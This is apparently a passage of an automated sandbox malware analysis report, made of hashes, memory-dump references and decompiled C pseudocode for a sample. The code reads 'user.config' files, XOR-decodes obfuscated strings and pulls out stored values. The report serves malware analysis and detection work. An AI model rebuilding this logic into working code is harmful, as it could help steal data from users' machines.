                                    • Associated: 00000000.00000002.320358841.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320502317.00000000008B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320530346.00000000008B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_810000_qRsw2oZH24.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: File$PointerRead$HandleInformationSize
                                    • String ID:
                                    • API String ID: 2979504256-0
                                    • Opcode ID: 352a32d3dc7da5fd1cfe373669f0ead5bdd5842e06c8e1922142d601d5f4b565
                                    • Instruction ID: 3ceb258ed15b162feef7a54e60226f26352eef8af192914f6b0c39913e1a2831
                                    • Opcode Fuzzy Hash: 352a32d3dc7da5fd1cfe373669f0ead5bdd5842e06c8e1922142d601d5f4b565
                                    • Instruction Fuzzy Hash: 86513EB1A14618ABEB24DF68DC95BAE77BDFF44704F14492DF906EB280D630DD448B60
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00880383 Relevance: 15.1, APIs: 10, Instructions: 69COMMON
                                    Download Yara Rule
                                    C-Code - Quality: 77%
                                    			E00880383(void* __edx, void* __esi, char _a4) {
				char _v5;
				char _v12;
				char _v16;
				char _v20;
				void* __ebp;
				char _t55;
				char _t61;
				intOrPtr _t67;
				void* _t71;
				void* _t72;

				_t72 = __esi;
				_t71 = __edx;
				_t36 = _a4;
				_t67 =  *_a4;
				_t76 = _t67 - 0x89d270;
				if(_t67 != 0x89d270) {
					E00880123(_t67);
					_t36 = _a4;
				}
				E00880123( *((intOrPtr*)(_t36 + 0x3c)));
				E00880123( *((intOrPtr*)(_a4 + 0x30)));
				E00880123( *((intOrPtr*)(_a4 + 0x34)));
				E00880123( *((intOrPtr*)(_a4 + 0x38)));
				E00880123( *((intOrPtr*)(_a4 + 0x28)));
				E00880123( *((intOrPtr*)(_a4 + 0x2c)));
				E00880123( *((intOrPtr*)(_a4 + 0x40)));
				E00880123( *((intOrPtr*)(_a4 + 0x44)));
				E00880123( *((intOrPtr*)(_a4 + 0x360)));
				_v16 =  &_a4;
				_t55 = 5;
				_v12 = _t55;
				_v20 = _t55;
				_push( &_v12);
				_push( &_v16);
				_push( &_v20);
				E008801AF( &_v5, _t71, _t76);
				_v16 =  &_a4;
				_t61 = 4;
				_v20 = _t61;
				_v12 = _t61;
				_push( &_v20);
				_push( &_v16);
				_push( &_v12);
				return E0088021A( &_v5, _t71, _t72, _t76);
			}













                                    0x00880383
                                    0x00880383
                                    0x00880388
                                    0x0088038e
                                    0x00880390
                                    0x00880396
                                    0x00880399
                                    0x0088039e
                                    0x008803a1
                                    0x008803a5
                                    0x008803b0
                                    0x008803bb
                                    0x008803c6
                                    0x008803d1
                                    0x008803dc
                                    0x008803e7
                                    0x008803f2
                                    0x00880400
                                    0x0088040b
                                    0x00880413
                                    0x00880414
                                    0x00880417
                                    0x0088041d
                                    0x00880421
                                    0x00880425
                                    0x00880426
                                    0x00880430
                                    0x00880436
                                    0x00880437
                                    0x0088043a
                                    0x00880440
                                    0x00880444
                                    0x00880448
                                    0x0088044f

                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.320073655.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                    • Associated: 00000000.00000002.320060165.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320358841.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320502317.00000000008B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320530346.00000000008B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_810000_qRsw2oZH24.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: _free$ErrorFreeHeapLast
                                    • String ID:
                                    • API String ID: 776569668-0
                                    • Opcode ID: b2497170d48a18a360e1f1ac356c84e96a649367f202b48e4a2752f04bc8d797
                                    • Instruction ID: 9aaa3f574e56947111ed598c3d4af5ab65a52e6ef76ee171360757aef63db5e1
                                    • Opcode Fuzzy Hash: b2497170d48a18a360e1f1ac356c84e96a649367f202b48e4a2752f04bc8d797
                                    • Instruction Fuzzy Hash: FE21967A904108AFCF81EF98D896DDE7BB9FF08350B0151A6B515DB121EB71EA48CF81
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0081B1C7 Relevance: 14.3, APIs: 1, Strings: 7, Instructions: 305COMMON
                                    Download Yara Rule
                                    C-Code - Quality: 76%
                                    			E0081B1C7(void* __edx, intOrPtr __edi) {
				intOrPtr _t192;
				char _t193;
				void* _t197;
				void* _t199;
				void* _t200;
				void* _t202;
				intOrPtr _t215;
				intOrPtr _t217;
				void* _t219;
				void* _t220;
				intOrPtr* _t221;
				char _t228;
				void* _t237;
				void* _t249;
				void* _t252;
				void* _t254;
				void* _t256;
				void* _t257;
				void* _t260;
				void* _t261;
				intOrPtr _t264;
				intOrPtr _t266;
				void* _t267;
				void* _t268;
				void* _t272;
				void* _t274;
				void* _t276;
				void* _t277;
				void* _t280;
				void* _t281;
				intOrPtr _t284;
				intOrPtr _t285;
				void* _t286;
				void* _t287;
				char _t292;
				char _t298;
				intOrPtr _t326;
				void* _t327;
				intOrPtr _t329;
				intOrPtr _t337;
				void* _t343;
				void* _t348;
				void* _t354;
				void* _t360;
				void* _t363;
				void* _t364;
				void* _t381;
				void* _t384;
				void* _t385;
				void* _t403;
				char _t405;
				void* _t406;
				char _t408;
				void* _t411;
				void* _t412;
				intOrPtr _t430;
				void* _t432;
				char _t436;
				signed int _t443;
				void* _t449;
				intOrPtr* _t451;
				intOrPtr _t453;
				void* _t454;
				intOrPtr* _t455;
				void* _t457;

				_t430 = __edi;
				while(1) {
					 *((intOrPtr*)(_t449 - 4)) = 9;
					E00813112(0, _t449 - 0x98, _t430, _t480);
					_t436 =  *((intOrPtr*)(_t449 - 0x94));
					_t430 =  *((intOrPtr*)(_t449 - 0x98));
					_t192 =  *((intOrPtr*)(_t449 - 0x5c));
					if(_t430 == _t192) {
						break;
					}
					 *((char*)(_t449 - 4)) = 0xa;
					if(E00812A7C(0, _t430, _t430) == 0) {
						_t348 = _t430 + 0x20;
						_t237 = E008123EB(_t348, _t449 - 0xb0);
						_push(_t348);
						 *((char*)(_t449 - 4)) = 0xb;
						E0082E5D4(_t237, _t449 - 0x40);
						 *((char*)(_t449 - 0xb4)) = 0;
						_push( *((intOrPtr*)(_t449 - 0xb4)));
						_t443 =  *(_t449 - 0x54) | 0x00000010;
						 *(_t449 - 0x54) = _t443;
						E0082E143(_t449 - 0x74, _t449 - 0x40);
						E0082DF41(_t449 - 0x40);
						 *((char*)(_t449 - 4)) = 0xa;
						L0082DD77(_t449 - 0xb0);
						_t354 = _t449 - 0x74;
						if(E0082EA7D(_t354, "user.config", _t430, _t443) != 0) {
							_push(_t354);
							E0082E5D4(_t430 + 0x20, _t449 - 0x40);
							 *(_t449 - 0x54) = _t443 | 0x00000080;
							 *((char*)(_t449 - 4)) = 0xc;
							_t247 =  >=  ?  *((void*)(_t449 - 0x40)) : _t449 - 0x40;
							_t457 = _t451 - 0x18;
							E0082DA74(_t457,  >=  ?  *((void*)(_t449 - 0x40)) : _t449 - 0x40);
							_t249 = E00818E25(0, _t449 - 0xb0, "user.config");
							_t358 = _t449 - 0x74;
							_t451 = _t457 + 0x18;
							if(_t449 - 0x74 != _t249) {
								 *((char*)(_t449 - 0xb8)) = 0;
								_push( *((intOrPtr*)(_t449 - 0xb8)));
								E0082E143(_t358, _t249);
							}
							E0082DF41(_t449 - 0xb0);
							_t360 = _t449 - 0x40;
							 *((char*)(_t449 - 4)) = 0xa;
							E0082DF41(_t360);
							_t252 = E0081B4B9();
							if( *((char*)(_t252 + 0x2e)) != 0) {
								_t408 = 0;
								do {
									 *(_t408 + _t252) =  *(_t408 + _t252) ^ 0x0000002e;
									_t408 = _t408 + 1;
								} while (_t408 < 0x2f);
							}
							_push(_t360);
							_t254 = L0082DFA2(_t449 - 0x74, 0, E0082D960(_t449 - 0x74, _t252));
							_t363 = _t449 - 0x74;
							E0082DA01(_t363, _t254);
							_push(_t363);
							_t364 = _t449 - 0x74;
							_t256 = E0082D960(_t364, "</value>");
							_push(_t364);
							_t38 = _t256 - 0x46; // -70
							_t257 = E0082D960(_t449 - 0x74, "<value>");
							_t260 = E0082D8D6(_t449 - 0x74, _t430, _t449 - 0x40, _t257 + 7);
							 *((char*)(_t449 - 4)) = 0xd;
							_t261 = L00818FD9(0, _t449 - 0xb0, _t260);
							_t368 = _t449 - 0x90;
							if(_t449 - 0x90 != _t261) {
								 *((char*)(_t449 - 0xbc)) = 0;
								_push( *((intOrPtr*)(_t449 - 0xbc)));
								E0082E143(_t368, _t261);
							}
							E0082DF41(_t449 - 0xb0);
							 *((char*)(_t449 - 4)) = 0xa;
							E0082DF41(_t449 - 0x40);
							_push( *((intOrPtr*)(_t449 - 0x80)));
							_t422 =  >=  ?  *((void*)(_t449 - 0x90)) : _t449 - 0x90;
							_t264 = E00822705(0, _t449 - 0xdc,  >=  ?  *((void*)(_t449 - 0x90)) : _t449 - 0x90);
							_t373 = _t264;
							 *((intOrPtr*)(_t449 - 0x14)) = _t264;
							 *((char*)(_t449 - 4)) = 0xe;
							 *((intOrPtr*)(_t449 - 0x48)) = 0x5c4b5d7b;
							 *((short*)(_t449 - 0x44)) = 0xe14;
							 *((char*)(_t449 - 0x42)) = 0x2e;
							_t430 =  *((intOrPtr*)( *[fs:0x2c]));
							_t266 =  *0x8b5428; // 0x0
							 *((intOrPtr*)(_t449 - 0x78)) = _t430;
							if(_t266 >  *((intOrPtr*)(_t430 + 4))) {
								E0086DB91(_t266, 0x8b5428);
								_t469 =  *0x8b5428 - 0xffffffff;
								_pop(_t406);
								if( *0x8b5428 == 0xffffffff) {
									asm("movsd");
									asm("movsw");
									asm("movsb");
									L0086DFE8(_t406, _t469, 0x8957e2);
									 *_t451 = 0x8b5428;
									L0086DB47();
									_t430 =  *((intOrPtr*)(_t449 - 0x78));
								}
								_t373 =  *((intOrPtr*)(_t449 - 0x14));
							}
							if( *0x8b5eee != 0) {
								_t298 = 0;
								do {
									 *(_t298 + 0x8b5ee8) =  *(_t298 + 0x8b5ee8) ^ 0x0000002e;
									_t298 = _t298 + 1;
									_t471 = _t298 - 7;
								} while (_t298 < 7);
							}
							_t267 = E0082EA3D(_t449 - 0x40, 0x8b5ee8, _t373);
							 *((char*)(_t449 - 4)) = 0xf;
							_t268 = E0082E917(_t449 - 0xb0, _t267, _t471, "\n");
							_t378 = _t449 - 0xf4;
							if(_t449 - 0xf4 != _t268) {
								 *((char*)(_t449 - 0x28)) = 0;
								_push( *((intOrPtr*)(_t449 - 0x28)));
								E0082E143(_t378, _t268);
							}
							E0082DF41(_t449 - 0xb0);
							E0082DF41(_t449 - 0x40);
							_t381 = _t449 - 0xdc;
							 *((char*)(_t449 - 4)) = 0xa;
							E0082DF41(_t381);
							_t272 = E0081B548();
							if( *((char*)(_t272 + 0x2e)) != 0) {
								_t405 = 0;
								do {
									 *(_t405 + _t272) =  *(_t405 + _t272) ^ 0x0000002e;
									_t405 = _t405 + 1;
								} while (_t405 < 0x2f);
							}
							_push(_t381);
							_t274 = L0082DFA2(_t449 - 0x74, 0, E0082D960(_t449 - 0x74, _t272));
							_t384 = _t449 - 0x74;
							E0082DA01(_t384, _t274);
							_push(_t384);
							_t385 = _t449 - 0x74;
							_t276 = E0082D960(_t385, "</value>");
							_push(_t385);
							_t84 = _t276 - 0x46; // -70
							_t277 = E0082D960(_t449 - 0x74, "<value>");
							_t280 = E0082D8D6(_t449 - 0x74, _t430, _t449 - 0x40, _t277 + 7);
							 *((char*)(_t449 - 4)) = 0x10;
							_t281 = L00818FD9(0, _t449 - 0xb0, _t280);
							_t389 = _t449 - 0x90;
							if(_t449 - 0x90 != _t281) {
								 *((char*)(_t449 - 0x24)) = 0;
								_push( *((intOrPtr*)(_t449 - 0x24)));
								E0082E143(_t389, _t281);
							}
							E0082DF41(_t449 - 0xb0);
							 *((char*)(_t449 - 4)) = 0xa;
							E0082DF41(_t449 - 0x40);
							_push( *((intOrPtr*)(_t449 - 0x80)));
							_t427 =  >=  ?  *((void*)(_t449 - 0x90)) : _t449 - 0x90;
							_t284 = E00822705(0, _t449 - 0xdc,  >=  ?  *((void*)(_t449 - 0x90)) : _t449 - 0x90);
							_t394 = _t284;
							 *((intOrPtr*)(_t449 - 0x14)) = _t284;
							 *((char*)(_t449 - 4)) = 0x11;
							_t285 =  *0x8b5d94; // 0x0
							 *((intOrPtr*)(_t449 - 0x50)) = 0x5d5d4f7e;
							 *((short*)(_t449 - 0x4c)) = 0xe14;
							 *((char*)(_t449 - 0x4a)) = 0x2e;
							if(_t285 >  *((intOrPtr*)(_t430 + 4))) {
								E0086DB91(_t285, 0x8b5d94);
								_t478 =  *0x8b5d94 - 0xffffffff;
								_pop(_t403);
								if( *0x8b5d94 == 0xffffffff) {
									_t430 = 0x8b6100;
									asm("movsd");
									asm("movsw");
									asm("movsb");
									L0086DFE8(_t403, _t478, 0x8957c2);
									 *_t451 = 0x8b5d94;
									L0086DB47();
								}
								_t394 =  *((intOrPtr*)(_t449 - 0x14));
							}
							if( *0x8b6106 != 0) {
								_t292 = 0;
								do {
									 *(_t292 + 0x8b6100) =  *(_t292 + 0x8b6100) ^ 0x0000002e;
									_t292 = _t292 + 1;
									_t480 = _t292 - 7;
								} while (_t292 < 7);
							}
							_t286 = E0082EA3D(_t449 - 0x40, 0x8b6100, _t394);
							 *((char*)(_t449 - 4)) = 0x12;
							_t287 = E0082E917(_t449 - 0xb0, _t286, _t480, "\n\n");
							 *((char*)(_t449 - 4)) = 0x13;
							E0082D9E5(_t287);
							E0082DF41(_t449 - 0xb0);
							E0082DF41(_t449 - 0x40);
							E0082DF41(_t449 - 0xdc);
						}
					}
				}
				__eflags = _t436;
				if(_t436 != 0) {
					E008116CB(_t436);
				}
				_t306 =  *((intOrPtr*)(_t449 - 0xc0));
				__eflags =  *((intOrPtr*)(_t449 - 0xc0));
				if( *((intOrPtr*)(_t449 - 0xc0)) != 0) {
					E008116CB(_t306);
				}
				 *((char*)(_t449 - 4)) = 0x15;
				_t193 = E0082EA7D(_t449 - 0xf4, 0x8a43ab, _t430, _t436);
				__eflags = _t193;
				if(_t193 == 0) {
					_t411 = 2;
					_t432 = L00818F5D(0, _t449 - 0x16c, _t411);
					_t412 = 8;
					 *((char*)(_t449 - 4)) = 0x16;
					_t199 = L00818F5D(0, _t449 - 0x154, _t412);
					 *((char*)(_t449 - 4)) = 0x17;
					_t200 = E0082E8C7(0, _t449 - 0x13c, 0x8b2a8c, _t432);
					 *((char*)(_t449 - 4)) = 0x18;
					E0082FA3B(_t449 - 0xb0,  *((intOrPtr*)(_t449 - 0x24)), _t200, _t199, "\\");
					 *((char*)(_t449 - 4)) = 0x19;
					_t202 = E0082E917(_t449 - 0x124, _t449 - 0xb0, __eflags, ".");
					_push(_t432);
					_push(_t202);
					 *((char*)(_t449 - 4)) = 0x1a;
					_push( *((intOrPtr*)(_t449 - 0x24)));
					E0082FA3B(_t449 - 0x40);
					E0082DF41(_t449 - 0x124);
					E0082DF41(_t449 - 0xb0);
					E0082DF41(_t449 - 0x13c);
					E0082DF41(_t449 - 0x154);
					 *((char*)(_t449 - 4)) = 0x20;
					E0082DF41(_t449 - 0x16c);
					_t453 = _t451 - 0x18;
					_t326 = _t453;
					 *((intOrPtr*)(_t449 - 0x24)) = _t453;
					 *((intOrPtr*)(_t326 + 0x10)) = 0;
					 *((intOrPtr*)(_t326 + 0x14)) = 0;
					E0082E0AB(_t326, _t449 - 0xf4);
					_t454 = _t453 - 0x18;
					 *((char*)(_t449 - 4)) = 0x21;
					_t327 = _t454;
					 *((intOrPtr*)(_t327 + 0x10)) = 0;
					 *((intOrPtr*)(_t327 + 0x14)) = 0;
					E0082E0AB(_t327, _t449 - 0x40);
					 *((char*)(_t449 - 4)) = 0x20;
					E00818DC6(_t449 - 0xb0);
					_t455 = _t454 + 0x30;
					__eflags =  *((intOrPtr*)(_t449 - 0x2c)) - 0x10;
					_t440 =  >=  ?  *((void*)(_t449 - 0x40)) : _t449 - 0x40;
					 *((intOrPtr*)(_t449 - 0x24)) =  >=  ?  *((void*)(_t449 - 0x40)) : _t449 - 0x40;
					_t215 = E0082D2AE(E0081B5D7());
					_t433 = _t215;
					 *((intOrPtr*)(_t449 - 0x20)) = 0x4a5c4160;
					 *((intOrPtr*)(_t449 - 0x28)) = _t215;
					 *((intOrPtr*)(_t449 - 0x1c)) = 0x72607e78;
					 *((char*)(_t449 - 0x18)) = 0x2e;
					_t329 =  *((intOrPtr*)( *[fs:0x2c]));
					_t217 =  *0x8b51c4; // 0x0
					__eflags = _t217 -  *((intOrPtr*)(_t329 + 4));
					if(_t217 >  *((intOrPtr*)(_t329 + 4))) {
						E0086DB91(_t217, 0x8b51c4);
						__eflags =  *0x8b51c4 - 0xffffffff;
						_pop(_t343);
						if(__eflags == 0) {
							asm("movsd");
							asm("movsd");
							asm("movsb");
							L0086DFE8(_t343, __eflags, 0x8957b5);
							 *_t455 = 0x8b51c4;
							L0086DB47();
							_t440 =  *((intOrPtr*)(_t449 - 0x24));
							_t433 =  *((intOrPtr*)(_t449 - 0x28));
						}
					}
					__eflags =  *0x8b4bb0;
					if( *0x8b4bb0 != 0) {
						_t228 = 0;
						do {
							 *(_t228 + 0x8b4ba8) =  *(_t228 + 0x8b4ba8) ^ 0x0000002e;
							_t228 = _t228 + 1;
							__eflags = _t228 - 9;
						} while (_t228 < 9);
					}
					 *((intOrPtr*)(_t449 - 0xcc)) = 0;
					 *((intOrPtr*)(_t449 - 0xc8)) = 0xf;
					 *((char*)(_t449 - 0xdc)) = 0;
					L0082DFE8(0x8b4ba8);
					 *((char*)(_t449 - 4)) = 0x22;
					_t219 = E0082E917(_t449 - 0x1b4, _t449 - 0xdc, __eflags, "[");
					 *((char*)(_t449 - 4)) = 0x23;
					_t220 = E0082E981(_t449 - 0x19c, _t219, 0x8b2abc);
					 *((char*)(_t449 - 4)) = 0x24;
					_t221 = E0082E917(_t449 - 0x184, _t220, __eflags, _t433);
					_pop(_t336);
					 *((char*)(_t449 - 4)) = 0x25;
					__eflags =  *((intOrPtr*)(_t221 + 0x14)) - 0x10;
					if( *((intOrPtr*)(_t221 + 0x14)) >= 0x10) {
						_t221 =  *_t221;
					}
					_push(_t336);
					_t337 =  *0x8b4804; // 0x1346140
					E008183DF(_t337, _t221, _t440);
					E0082DF41(_t449 - 0x184);
					E0082DF41(_t449 - 0x19c);
					E0082DF41(_t449 - 0x1b4);
					E0082DF41(_t449 - 0xdc);
					 *0x8b4837 = 1;
					E0082DF41(_t449 - 0x40);
				}
				E0082DF41(_t449 - 0x10c);
				E0082DF41(_t449 - 0x90);
				E0082DF41(_t449 - 0x74);
				_t197 = E0082DF41(_t449 - 0xf4);
				 *[fs:0x0] =  *((intOrPtr*)(_t449 - 0xc));
				return _t197;
			}




































































                                    0x0081b1c7
                                    0x0081b1c9
                                    0x0081b1cf
                                    0x0081b1d6
                                    0x0081b1db
                                    0x0081b1e1
                                    0x0081b1e7
                                    0x0081ad90
                                    0x00000000
                                    0x00000000
                                    0x0081ad98
                                    0x0081ada3
                                    0x0081adb0
                                    0x0081adb3
                                    0x0081adb8
                                    0x0081adbc
                                    0x0081adc3
                                    0x0081adce
                                    0x0081add7
                                    0x0081addd
                                    0x0081ade1
                                    0x0081ade4
                                    0x0081adec
                                    0x0081adf7
                                    0x0081adfb
                                    0x0081ae05
                                    0x0081ae0f
                                    0x0081ae15
                                    0x0081ae1d
                                    0x0081ae28
                                    0x0081ae2b
                                    0x0081ae36
                                    0x0081ae3a
                                    0x0081ae40
                                    0x0081ae4b
                                    0x0081ae50
                                    0x0081ae53
                                    0x0081ae58
                                    0x0081ae5a
                                    0x0081ae60
                                    0x0081ae67
                                    0x0081ae67
                                    0x0081ae72
                                    0x0081ae77
                                    0x0081ae7a
                                    0x0081ae7e
                                    0x0081ae83
                                    0x0081ae8c
                                    0x0081ae8e
                                    0x0081ae90
                                    0x0081ae90
                                    0x0081ae94
                                    0x0081ae95
                                    0x0081ae90
                                    0x0081ae9a
                                    0x0081aea9
                                    0x0081aeaf
                                    0x0081aeb2
                                    0x0081aeb7
                                    0x0081aebd
                                    0x0081aec0
                                    0x0081aec5
                                    0x0081aece
                                    0x0081aed1
                                    0x0081aee2
                                    0x0081aee9
                                    0x0081aef3
                                    0x0081aef8
                                    0x0081af00
                                    0x0081af02
                                    0x0081af08
                                    0x0081af0f
                                    0x0081af0f
                                    0x0081af1a
                                    0x0081af22
                                    0x0081af26
                                    0x0081af35
                                    0x0081af38
                                    0x0081af45
                                    0x0081af4b
                                    0x0081af4d
                                    0x0081af50
                                    0x0081af5a
                                    0x0081af61
                                    0x0081af67
                                    0x0081af6b
                                    0x0081af6d
                                    0x0081af72
                                    0x0081af7b
                                    0x0081af82
                                    0x0081af87
                                    0x0081af8e
                                    0x0081af8f
                                    0x0081af9e
                                    0x0081af9f
                                    0x0081afa1
                                    0x0081afa2
                                    0x0081afa7
                                    0x0081afae
                                    0x0081afb3
                                    0x0081afb6
                                    0x0081afb7
                                    0x0081afb7
                                    0x0081afc1
                                    0x0081afc3
                                    0x0081afc5
                                    0x0081afc5
                                    0x0081afcc
                                    0x0081afcd
                                    0x0081afcd
                                    0x0081afc5
                                    0x0081afdb
                                    0x0081afe8
                                    0x0081aff2
                                    0x0081aff8
                                    0x0081b000
                                    0x0081b002
                                    0x0081b005
                                    0x0081b009
                                    0x0081b009
                                    0x0081b014
                                    0x0081b01c
                                    0x0081b021
                                    0x0081b027
                                    0x0081b02b
                                    0x0081b030
                                    0x0081b039
                                    0x0081b03b
                                    0x0081b03d
                                    0x0081b03d
                                    0x0081b041
                                    0x0081b042
                                    0x0081b03d
                                    0x0081b047
                                    0x0081b056
                                    0x0081b05c
                                    0x0081b05f
                                    0x0081b064
                                    0x0081b06a
                                    0x0081b06d
                                    0x0081b072
                                    0x0081b07b
                                    0x0081b07e
                                    0x0081b08f
                                    0x0081b096
                                    0x0081b0a0
                                    0x0081b0a5
                                    0x0081b0ad
                                    0x0081b0af
                                    0x0081b0b2
                                    0x0081b0b6
                                    0x0081b0b6
                                    0x0081b0c1
                                    0x0081b0c9
                                    0x0081b0cd
                                    0x0081b0dc
                                    0x0081b0df
                                    0x0081b0ec
                                    0x0081b0f2
                                    0x0081b0f4
                                    0x0081b0f7
                                    0x0081b0fb
                                    0x0081b100
                                    0x0081b107
                                    0x0081b10d
                                    0x0081b117
                                    0x0081b11e
                                    0x0081b123
                                    0x0081b12a
                                    0x0081b12b
                                    0x0081b12d
                                    0x0081b13a
                                    0x0081b13b
                                    0x0081b13d
                                    0x0081b13e
                                    0x0081b143
                                    0x0081b14a
                                    0x0081b14f
                                    0x0081b150
                                    0x0081b150
                                    0x0081b15a
                                    0x0081b15c
                                    0x0081b15e
                                    0x0081b15e
                                    0x0081b165
                                    0x0081b166
                                    0x0081b166
                                    0x0081b15e
                                    0x0081b174
                                    0x0081b181
                                    0x0081b18b
                                    0x0081b198
                                    0x0081b19c
                                    0x0081b1a7
                                    0x0081b1af
                                    0x0081b1ba
                                    0x0081b1ba
                                    0x0081ae0f
                                    0x0081ada3
                                    0x0081b1ef
                                    0x0081b1f1
                                    0x0081b1f5
                                    0x0081b1f5
                                    0x0081b1fa
                                    0x0081b200
                                    0x0081b202
                                    0x0081b204
                                    0x0081b204
                                    0x0081b20e
                                    0x0081b218
                                    0x0081b21d
                                    0x0081b21f
                                    0x0081b227
                                    0x0081b233
                                    0x0081b237
                                    0x0081b23e
                                    0x0081b242
                                    0x0081b253
                                    0x0081b25d
                                    0x0081b265
                                    0x0081b272
                                    0x0081b282
                                    0x0081b28c
                                    0x0081b292
                                    0x0081b293
                                    0x0081b294
                                    0x0081b29b
                                    0x0081b29e
                                    0x0081b2a9
                                    0x0081b2b4
                                    0x0081b2bf
                                    0x0081b2ca
                                    0x0081b2d5
                                    0x0081b2d9
                                    0x0081b2de
                                    0x0081b2e7
                                    0x0081b2e9
                                    0x0081b2ed
                                    0x0081b2f0
                                    0x0081b2f3
                                    0x0081b2f8
                                    0x0081b2fb
                                    0x0081b2ff
                                    0x0081b305
                                    0x0081b308
                                    0x0081b30b
                                    0x0081b310
                                    0x0081b314
                                    0x0081b319
                                    0x0081b31f
                                    0x0081b323
                                    0x0081b327
                                    0x0081b331
                                    0x0081b336
                                    0x0081b338
                                    0x0081b345
                                    0x0081b348
                                    0x0081b34f
                                    0x0081b353
                                    0x0081b355
                                    0x0081b35a
                                    0x0081b360
                                    0x0081b367
                                    0x0081b36c
                                    0x0081b373
                                    0x0081b374
                                    0x0081b383
                                    0x0081b384
                                    0x0081b385
                                    0x0081b386
                                    0x0081b38b
                                    0x0081b392
                                    0x0081b397
                                    0x0081b39a
                                    0x0081b39d
                                    0x0081b374
                                    0x0081b39e
                                    0x0081b3a5
                                    0x0081b3a7
                                    0x0081b3a9
                                    0x0081b3a9
                                    0x0081b3b0
                                    0x0081b3b1
                                    0x0081b3b1
                                    0x0081b3a9
                                    0x0081b3c1
                                    0x0081b3c7
                                    0x0081b3d1
                                    0x0081b3d7
                                    0x0081b3e7
                                    0x0081b3f1
                                    0x0081b3fe
                                    0x0081b408
                                    0x0081b411
                                    0x0081b41b
                                    0x0081b420
                                    0x0081b421
                                    0x0081b425
                                    0x0081b429
                                    0x0081b42b
                                    0x0081b42b
                                    0x0081b42e
                                    0x0081b42f
                                    0x0081b438
                                    0x0081b446
                                    0x0081b451
                                    0x0081b45c
                                    0x0081b467
                                    0x0081b46f
                                    0x0081b476
                                    0x0081b476
                                    0x0081b481
                                    0x0081b48c
                                    0x0081b494
                                    0x0081b49f
                                    0x0081b4a9
                                    0x0081b4b2

                                    APIs
                                      • Part of subcall function 0082DF41: _Deallocate.LIBCONCRT ref: 0082DF50
                                      • Part of subcall function 0082DD77: _Deallocate.LIBCONCRT ref: 0082DD8C
                                      • Part of subcall function 00818E25: __fread_nolock.LIBCMT ref: 00818E85
                                    • WerSetFlags.KERNEL32 ref: 0081B05F
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.320073655.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                    • Associated: 00000000.00000002.320060165.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320358841.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320502317.00000000008B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320530346.00000000008B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_810000_qRsw2oZH24.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Deallocate$Flags__fread_nolock
                                    • String ID: .$.$</value>$<value>$user.config${]K\$~O]]
                                    • API String ID: 377039844-215079484
                                    • Opcode ID: 8908d477cb33cc2da48144e2840c6e5543c7b575d29808f5dd3374d2d076c07f
                                    • Instruction ID: c9357091268cb88617ba7ff47135470cafe77fcf41b4c771af917a9dae9cd01a
                                    • Opcode Fuzzy Hash: 8908d477cb33cc2da48144e2840c6e5543c7b575d29808f5dd3374d2d076c07f
                                    • Instruction Fuzzy Hash: F9C18E709042A8DADF15EBA8D955BEDBB75FF14300F2401A8E006F7292DB741E89CB66
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0084706C Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 218COMMON
                                    Download Yara Rule
                                    C-Code - Quality: 50%
                                    			E0084706C(intOrPtr* __ecx, intOrPtr __edx, intOrPtr _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				signed int _v28;
				intOrPtr* _v32;
				intOrPtr _v36;
				intOrPtr _t52;
				signed int _t57;
				void* _t65;
				void* _t66;
				void* _t67;
				intOrPtr _t68;
				void* _t71;
				intOrPtr _t76;
				signed int _t83;
				intOrPtr* _t88;
				void* _t134;
				void* _t144;
				void* _t146;
				intOrPtr* _t148;
				intOrPtr _t149;
				intOrPtr _t150;
				void* _t154;
				void* _t155;
				void* _t156;

				_t128 = __edx;
				_t88 = __ecx;
				_v8 = __edx;
				_t150 = 0;
				_v16 = _v16 & 0;
				_t52 =  *__ecx;
				_v20 = _t52;
				_t159 =  *((char*)(_t52 + 0x1e));
				if( *((char*)(_t52 + 0x1e)) == 0) {
					_t148 = E0084868B(__ecx, __edx, _t159,  *((intOrPtr*)(__edx + 0xc)),  *((intOrPtr*)(__edx + 8)));
					_v32 = _t148;
					if(_t148 != 0) {
						_t57 = E0084C6A7( *__ecx,  *((intOrPtr*)(_t148 + 0x4c)));
						_v28 = _t57;
						_v12 =  *((intOrPtr*)(_t57 * 0x18 +  *((intOrPtr*)(_v20 + 8))));
						_t150 = E00848A99(_v20, _a4);
						_v36 = _t150;
						if(_t150 != 0) {
							if(E00848615(_t150, _v12) != 0 || E008486CA(_v20, _t150, _v12) != 0 || E00873BA0( *_t148) > 6 && E00832345( *_t148, "sqlite_", 7) == 0) {
								L21:
								_push(0x8a43ab);
								_push(_t88);
								E00832264(__eflags);
								goto L22;
							} else {
								_t65 = E00848BC4(_t150);
								if(_t65 == 0) {
